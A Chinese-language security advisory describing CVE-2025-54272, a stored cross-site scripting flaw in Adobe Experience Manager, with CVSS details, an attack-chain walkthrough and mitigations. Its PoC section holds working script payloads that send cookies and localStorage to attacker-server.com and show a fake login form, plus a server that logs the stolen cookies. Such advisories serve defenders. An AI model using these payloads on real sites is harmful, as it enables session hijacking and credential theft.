CVE-2025-54272 Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-54272

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager (AEM)

漏洞概述

CVE-2025-54272是Adobe Experience Manager（AEM）11.6及更早版本中存在的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞由Adobe产品安全事件响应团队（[email protected]）发现，并于2025年10月14日正式披露。根据CVSS 3.1评分体系，该漏洞评分为5.4分，属于中等严重等级。

该漏洞允许低权限攻击者通过向AEM中易受攻击的表单字段注入恶意JavaScript脚本来实施攻击。当受害者访问包含恶意脚本的页面时，注入的恶意代码将在其浏览器中执行。由于该漏洞属于存储型XSS，恶意脚本会被持久化存储在服务器端，因此每次受害者访问受影响的页面时都会触发恶意代码执行，而无需攻击者进行额外的交互操作。

该漏洞的利用需要用户交互，受害者必须主动打开攻击者构造的恶意链接才能触发攻击。攻击者需要具备低权限账户即可利用此漏洞，攻击成功后将导致受害者浏览器中执行任意JavaScript代码，可能造成会话劫持、敏感信息窃取、钓鱼攻击或恶意重定向等安全风险。漏洞的范围（Scope）标识为已改变（Changed），表明漏洞的影响超出了其直接组件的范围。

技术细节

存储型XSS漏洞的核心原理在于Web应用程序对用户输入的数据缺乏充分的验证和过滤，导致恶意脚本被持久化存储在服务器端（如数据库、文件系统等），并在后续页面渲染时被原样输出到受害者的浏览器中执行。

在Adobe Experience Manager的具体场景中，攻击者利用流程如下：

1. 攻击者使用低权限账户登录AEM系统，定位到存在输入验证缺陷的表单字段；
2. 攻击者构造包含恶意JavaScript代码的payload，例如：`<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`；
3. 将恶意payload提交到表单字段，由于服务器端缺乏对HTML/JavaScript标签的过滤和转义处理，恶意代码被存储到后端数据库中；
4. 当其他用户（受害者）访问包含该字段内容的页面时，服务器将存储的恶意数据原样返回并嵌入到HTML响应中；
5. 受害者的浏览器解析该HTML并执行其中的恶意JavaScript代码，攻击者即可窃取会话Cookie、进行钓鱼攻击或执行其他恶意操作。

漏洞的CVSS向量为AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N，表明攻击通过网络进行、攻击复杂度低、需低权限认证、需要用户交互、范围改变、机密性和完整性影响低、无可用性影响。

攻击链分析

STEP 1

第一步：获取低权限账户

攻击者通过社会工程、凭证填充或其他方式获取Adobe Experience Manager的低权限用户账户，该账户需具有访问易受攻击表单字段的权限。

STEP 2

第二步：构造恶意Payload

攻击者构造包含恶意JavaScript代码的payload，如窃取Cookie、会话劫持或钓鱼攻击的脚本，并将其嵌入到HTML标签中。

STEP 3

第三步：注入恶意脚本

攻击者登录AEM系统，将恶意payload提交到存在输入验证缺陷的表单字段中。由于服务器未对输入进行充分的过滤和转义，恶意脚本被持久化存储到后端数据库。

STEP 4

第四步：诱导受害者访问

攻击者通过钓鱼邮件、即时消息或其他方式向受害者发送包含受影响页面链接的恶意链接，诱导受害者点击访问。

STEP 5

第五步：恶意脚本执行

受害者在浏览器中打开包含存储型恶意脚本的页面，浏览器解析HTML并执行其中注入的JavaScript代码，攻击者即可窃取会话凭证、进行钓鱼攻击或执行其他恶意操作。

STEP 6

第六步：数据窃取与权限提升

攻击者利用窃取的会话Cookie冒充受害者身份，可能进一步提升权限或访问敏感数据，造成更大的安全危害。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-54272 PoC - Stored XSS in Adobe Experience Manager -->
<!-- This PoC demonstrates the stored XSS vulnerability in AEM form fields -->

<!-- Step 1: Attacker submits malicious payload via vulnerable form field -->
<!-- The payload is stored in the server-side database -->

<!-- Malicious payloads that can be injected into vulnerable form fields: -->

<!-- Payload 1: Cookie stealing -->
<script>
    var img = new Image();
    img.src = 'https://attacker-server.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

<!-- Payload 2: Session hijacking via fetch -->
<script>
    fetch('https://attacker-server.com/collect', {
        method: 'POST',
        body: JSON.stringify({
            cookies: document.cookie,
            url: window.location.href,
            localStorage: JSON.stringify(localStorage)
        }),
        headers: {'Content-Type': 'application/json'}
    });
</script>

<!-- Payload 3: DOM manipulation for phishing -->
<script>
    document.body.innerHTML = '<form action="https://attacker-server.com/phish" method="POST"><h3>Session Expired</h3><input name="username" placeholder="Username"><input name="password" type="password" placeholder="Password"><button>Login</button></form>';
</script>

<!-- Step 2: Victim visits the page containing the stored malicious content -->
<!-- The browser executes the injected script automatically -->

<!-- Step 3: Attacker receives stolen data on their server -->
<!-- Example attacker-side collection endpoint (Node.js): -->
/*
const express = require('express');
const app = express();
app.get('/steal', (req, res) => {
    console.log('Stolen cookie:', req.query.cookie);
    // Store or exfiltrate the stolen session data
    res.status(200).end();
});
app.listen(8080);
*/

<!-- Note: Exploitation requires the attacker to have low-privilege access -->
<!-- and the victim to visit the page containing the injected content -->

影响范围

Adobe Experience Manager <= 11.6

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对所有用户输入实施严格的白名单验证和HTML实体编码转义；2）部署或更新Web应用防火墙（WAF）规则以检测和阻止XSS攻击payload；3）实施Content Security Policy（CSP）头部限制脚本执行来源；4）为所有会话Cookie添加HttpOnly和Secure标志；5）审查并限制低权限用户对表单字段的写入权限；6）监控异常的用户输入和页面访问行为，及时发现潜在攻击。